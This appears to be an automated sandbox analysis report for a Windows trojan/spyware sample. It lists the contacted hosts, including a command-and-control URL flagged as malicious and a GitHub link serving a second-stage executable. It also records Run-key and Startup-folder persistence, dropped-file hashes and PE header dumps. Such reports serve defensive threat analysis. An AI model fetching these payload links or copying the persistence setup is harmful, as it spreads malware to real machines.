                                      high
                                      http://sigint.ws/f8dfksdj3/index.phptrue
                                      • 2%, Virustotal, Browse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://raw.githubusercontent.com/neiqops/ajajaj/main/file_22613.exetrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://github.com/neiqops/ajajaj/raw/main/file_22613.exefalse
                                        high
                                        https://north.ac/760false
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://north.ac/760false
                                        • Avira URL Cloud: safe
                                        unknown
                                        sigint.ws/f8dfksdj3/index.phptrue
                                        • Avira URL Cloud: malware
                                        low
                                        https://t.me/hyipsdigestfalse
                                          high
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://t.me/file_22613.exe, 00000011.00000002.512252256.00000000014FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://www.fontbureau.com/designersG0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://t.me/hyipsdigesfile_22613.exe, 00000011.00000002.514627703.000000000D590000.00000004.00000800.00020000.00000000.sdmp, file_22613.exe, 00000011.00000003.460609044.000000000D630000.00000040.00000800.00020000.00000000.sdmp, file_22613.exe, 00000012.00000002.526539114.000000000F800000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                http://www.fontbureau.com/designers/?0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.founder.com.cn/cn/bThe0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://t.me/hyipsdigestCfile_22613.exe, 00000011.00000002.512252256.00000000014FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.fontbureau.com/designers?0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://t.me/hyipsdigestHfile_22613.exe, 00000011.00000002.512252256.00000000014FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://telegram.org/img/t_logo.pngfile_22613.exe, 00000011.00000002.511434019.00000000012F8000.00000004.00000010.00020000.00000000.sdmpfalse
                                                          high
                                                          https://north.ac40XzeMRyE1e.exe, 00000000.00000002.300992280.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.430045319.00000000026F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.tiro.com0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.goodfont.co.kr0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.sajatypeworks.com0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.typography.netD0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.founder.com.cn/cn/cThe0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.galapagosdesign.com/staff/dennis.htm0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://fontfabrik.com0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.galapagosdesign.com/DPlease0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fonts.com0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.sandoll.co.kr0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://94.130.174.62/nfile_22613.exe, 00000011.00000002.514054783.00000000038C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.urwpp.deDPlease0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.zhongyicts.com.cn0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0XzeMRyE1e.exe, 00000000.00000002.300951055.0000000002751000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.430007815.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.sakkal.com0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://94.130.174.62/gfile_22613.exe, 00000011.00000002.514054783.00000000038C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.apache.org/licenses/LICENSE-2.00XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.fontbureau.com0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://certs.starfieldtech.com/repository/1402file_22613[1].exe.13.dr, file_22613.exe.13.drfalse
                                                                      high
                                                                      https://t.me/hyipsdigesthttps://mastodon.online/file_22613.exe, 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp, file_22613.exe, 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, file_22613.exe, 00000012.00000002.526917748.000000000F878000.00000002.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://sigint.ws/f8dfksdj3/index.php20XzeMRyE1e.exe, 0000000D.00000002.510921377.0000000003FF4000.00000004.00000800.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        http://www.microsoft.file_22613.exe, 00000011.00000002.514054783.00000000038C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://sigint.ws/f8dfksdj3/index.phpD%0XzeMRyE1e.exe, 0000000D.00000002.510921377.0000000003FF4000.00000004.00000800.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        http://www.carterandcone.coml0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.fontbureau.com/designers/cabarga.htmlN0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.founder.com.cn/cn0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.fontbureau.com/designers/frere-user.html0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://mastodon.online/file_22613.exe, file_22613.exe, 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp, file_22613.exe, 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, file_22613.exe, 00000012.00000002.526917748.000000000F878000.00000002.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.jiyu-kobo.co.jp/0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://www.fontbureau.com/designers80XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://94.130.174.62/1file_22613.exe, 00000011.00000002.514054783.00000000038C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://94.130.174.62/file_22613.exe, 00000011.00000002.514054783.00000000038C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://north.ac0XzeMRyE1e.exe, 00000000.00000002.300951055.0000000002751000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.430007815.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              172.67.152.230
                                                                              north.acUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              94.130.174.62
                                                                              unknownGermany
                                                                              24940HETZNER-ASDEfalse
                                                                              185.199.108.133
                                                                              raw.githubusercontent.comNetherlands
                                                                              54113FASTLYUSfalse
                                                                              80.66.64.103
                                                                              sigint.wsRussian Federation
                                                                              202723VAD-SRL-AS1MDfalse
                                                                              140.82.121.3
                                                                              github.comUnited States
                                                                              36459GITHUBUSfalse
                                                                              149.154.167.99
                                                                              t.meUnited Kingdom
                                                                              62041TELEGRAMRUfalse
                                                                              104.21.2.205
                                                                              unknownUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              IP
                                                                              192.168.2.1
                                                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                                                              Analysis ID:637914
                                                                              Start date and time: 02/06/202201:52:062022-06-02 01:52:06 +02:00
                                                                              Joe Sandbox Product:CloudBasic
                                                                              Overall analysis duration:0h 13m 57s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Sample file name:0XzeMRyE1e.exe
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                              Number of analysed new started processes analysed:29
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • HDC enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.adwa.spyw.evad.winEXE@13/5@9/8
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HDC Information:
                                                                              • Successful, ratio: 3.4% (good quality ratio 3.2%)
                                                                              • Quality average: 75.1%
                                                                              • Quality standard deviation: 29.6%
                                                                              HCA Information:
                                                                              • Successful, ratio: 92%
                                                                              • Number of executed functions: 118
                                                                              • Number of non-executed functions: 196
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Adjust boot time
                                                                              • Enable AMSI
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 52.242.101.226, 20.223.24.244, 20.54.89.106
                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              TimeTypeDescription
                                                                              01:53:29API Interceptor2124x Sleep call for process: 0XzeMRyE1e.exe modified
                                                                              01:53:39AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe
                                                                              01:53:58AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run file_22613.exe C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe
                                                                              01:54:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run file_22613.exe C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              Process:C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1488
                                                                              Entropy (8bit):5.338732761611821
                                                                              Encrypted:false
                                                                              SSDEEP:24:ML9E4Ks29E4Kx1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4xLE4qE4o:MxHKX9HKx1qHiYHKhQnoPtHoxHhAHKz5
                                                                              MD5:1F4A1BE521D03C78DFC1140748736A44
                                                                              SHA1:FFEF96E58627E28B889AC3732AF9CE9523FC1D3F
                                                                              SHA-256:957C045BF1FFDD6BCCFDC09E4ED5C1BBE4A84F578D4183F3664D464EC207E960
                                                                              SHA-512:2A96AE11073B5A8DA06AB3B04ECB04725F3579FB5B1FFCC58EE875B414ADA246BACA8D9434C992AB42E3E21DCA19865AC370FBC7AEBC5EB8C0D24A445FCDCA2B
                                                                              Malicious:true
                                                                              Reputation:unknown
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                              Process:C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1472680
                                                                              Entropy (8bit):7.646987510852842
                                                                              Encrypted:false
                                                                              SSDEEP:24576:L3Gz6a7Y5F9FalhN8UyHmqso17/cSvVXJwG/ECH3Jz2dRynhPJ3r:L3NaUF9FaDaU2hRVSvCXV23YJ7
                                                                              MD5:FE87E3591C90ECCD54C558FB487E262E
                                                                              SHA1:99A5F5220CFA72DF5D6D82F2E3193D26D63CE381
                                                                              SHA-256:0CDF56C68C183787FC86A47C092C5C75C7495BC632997EFFE9116820AFD6D9D1
                                                                              SHA-512:91389A61448C9031AFB3FF189092685617A56C9C1AB32E13160DBF59B728EC1FB9352ED5FBCBD1894C6D80D3A2FBDA48DC4DCCD5F87049EC3620D1DF60E0214D
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: Metadefender, Detection: 20%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 65%
                                                                              Reputation:unknown
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K..............l.......z.......}......:................s.......m.......n.......h.....Rich............................PE..L...R..b.............................3............@.......................................@.....................................P.......8t...........d...............................................6..@...............|............................text............................... ..`.data...d1..........................@....rsrc...8t.......v..................@..@.reloc..P&.......(...<..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1472680
                                                                              Entropy (8bit):7.646987510852842
                                                                              Encrypted:false
                                                                              SSDEEP:24576:L3Gz6a7Y5F9FalhN8UyHmqso17/cSvVXJwG/ECH3Jz2dRynhPJ3r:L3NaUF9FaDaU2hRVSvCXV23YJ7
                                                                              MD5:FE87E3591C90ECCD54C558FB487E262E
                                                                              SHA1:99A5F5220CFA72DF5D6D82F2E3193D26D63CE381
                                                                              SHA-256:0CDF56C68C183787FC86A47C092C5C75C7495BC632997EFFE9116820AFD6D9D1
                                                                              SHA-512:91389A61448C9031AFB3FF189092685617A56C9C1AB32E13160DBF59B728EC1FB9352ED5FBCBD1894C6D80D3A2FBDA48DC4DCCD5F87049EC3620D1DF60E0214D
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: Metadefender, Detection: 20%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 65%
                                                                              Reputation:unknown
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K..............l.......z.......}......:................s.......m.......n.......h.....Rich............................PE..L...R..b.............................3............@.......................................@.....................................P.......8t...........d...............................................6..@...............|............................text............................... ..`.data...d1..........................@....rsrc...8t.......v..................@..@.reloc..P&.......(...<..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):26112
                                                                              Entropy (8bit):4.928976046600336
                                                                              Encrypted:false
                                                                              SSDEEP:384:1JzYYYA2+plYBp5BxipUUXQvV/UHsxl94Rm4Hs4i1PgVhweVrNM2nTGbqHZAsqef:8+qtcHdD5PXlHnTx5m4
                                                                              MD5:4A2AC1E629644BE2B37F29F21998C8D3
                                                                              SHA1:A11CF92600E88810AF392D2514795C165BCEA940
                                                                              SHA-256:7CB09DD4D3A661362B75EA236711AB5601F636EDB0D2C647FA8F18E190678B1D
                                                                              SHA-512:14699E0BC6B60AC35DDDFA9966966A9D9652BF2FB3E25CA30AC8BBBCFE72A567812D25B1E3C8609BBF3663CA45341EE0A888C5FCC762A8E5FBC014D134640268
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Metadefender, Detection: 14%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 65%
                                                                              Reputation:unknown
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o.b..............0..F..........:d... ........@.. ....................................@..................................c..O.......0............................b............................................... ............... ..H............text...@D... ...F.................. ..`.rsrc...0............H..............@..@.reloc...............d..............@..B.................d......H........=..`$......1....a..............................................^..}.....(.......(.....*..*..0..C.........{.....o......{.....o......{.....o......{.....o......{.....o.....*..0..P.........{.....o......{.....o......{.....o......{.....o......{.....o......{.....o.....*.0..C.........{.....o......{.....o......{.....o......{.....o......{.....o.....*..0..C.........{.....o......{.....o......{.....o......{.....o......{.....o.....*..0..C.........{.....o......{.....o......{.....o.
                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:modified
                                                                              Size (bytes):26
                                                                              Entropy (8bit):3.95006375643621
                                                                              Encrypted:false
                                                                              SSDEEP:3:ggPYV:rPYV
                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                              Malicious:true
                                                                              Reputation:unknown
                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):4.928976046600336
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              File name:0XzeMRyE1e.exe
                                                                              File size:26112
                                                                              MD5:4a2ac1e629644be2b37f29f21998c8d3
                                                                              SHA1:a11cf92600e88810af392d2514795c165bcea940
                                                                              SHA256:7cb09dd4d3a661362b75ea236711ab5601f636edb0d2c647fa8f18e190678b1d
                                                                              SHA512:14699e0bc6b60ac35dddfa9966966a9d9652bf2fb3e25ca30ac8bbbcfe72a567812d25b1e3c8609bbf3663ca45341ee0a888c5fcc762a8e5fbc014d134640268
                                                                              SSDEEP:384:1JzYYYA2+plYBp5BxipUUXQvV/UHsxl94Rm4Hs4i1PgVhweVrNM2nTGbqHZAsqef:8+qtcHdD5PXlHnTx5m4
                                                                              TLSH:C0C2E605B3B46723D5B847F116A39D2003BC7D2B68A1DB082DC974EF1966F04DA92B7B
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o..b..............0..F..........:d... ........@.. ....................................@................................
                                                                              Icon Hash:71e874ba9a74e031
                                                                              Entrypoint:0x40643a
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                              Time Stamp:0x628FE36F [Thu May 26 20:30:39 2022 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:v4.0.30319
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x63e80x4f.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x1b30.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000xc.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x62b00x1c.text
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x20000x44400x4600False0.389676339286data5.12816317374IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0x80000x1b300x1c00False0.291015625data4.02019644997IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0xa0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                              NameRVASizeTypeLanguageCountry
                                                                              RT_ICON0x81200x468GLS_BINARY_LSB_FIRST
                                                                              RT_ICON0x85980x10a8data
                                                                              RT_GROUP_ICON0x96500x22data
                                                                              RT_VERSION0x96840x2acdata
